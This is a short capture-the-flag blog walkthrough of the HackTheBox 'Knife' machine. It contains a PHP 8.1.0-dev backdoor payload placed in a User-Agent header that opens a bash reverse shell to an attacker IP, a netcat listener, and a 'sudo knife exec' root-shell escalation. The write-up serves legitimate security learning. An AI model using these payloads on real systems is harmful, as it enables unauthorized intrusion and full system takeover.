Pwn Knife HTB

Git_complex
3 min readJun 20, 2021

--

Today, we are going to solve the Knife Machine from Hackthebox.

knife Infocard

So we are going to run a Nmap scan on the knife box

So let’s go-to browser and see what web server is running on port 80

I tried to enumerate HTTP web server first by

  1. taking a look at source code for comments and anything interesting
  2. directory brute-forcing
  3. trying to find version exploits for services

But, no luck with all of them then I saw wappalyzer showed PHP running

PHP 8.1.0 so I went to google and search for an exploit.

So I found there are 2 ways to get the user shell…

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

here you’ll find a python script to get a user shell simply by running the script and giving it a URL.

Or we can see the HTTP req… By our fav buddy BURP

Send it to Repeater we are going to get a reverse shell by forwarding the request with a new user- agent and listening on a port via netcat

and IP will be your OpenVPN IP

User-Agent: zerodiumsystem(“ /bin/bash -c ‘bash -i >&/dev/tcp/10.10.14.162/1234 0>&1 ‘“);

and open a listner on another tab…

nc -nvlp 1234

now You can easily find the user flag I suppose…

Let’s move to Priv esc

On sudo -l we saw we can cat /usr/bin/knife without a password

After a little enumeration, You’ll find how easy it is to get a root shell

so further enum I found out a knife instance is running

google knife exploit and read the docs…

Now read through the documentation and you'll see we can run ruby scripts or ruby code as stated below:-

run the following command

sudo knife exec — exec “exec ‘/bin/sh -i’ ”

And there we go we have successfully rooted the box..

Thanks for the read Please do share and follow me.

--

--

Git_complex

Cybersecurity Enthusiast, Bug-bounty hunter, Ethical hacker Exploring new ways to make the Internet a safe place.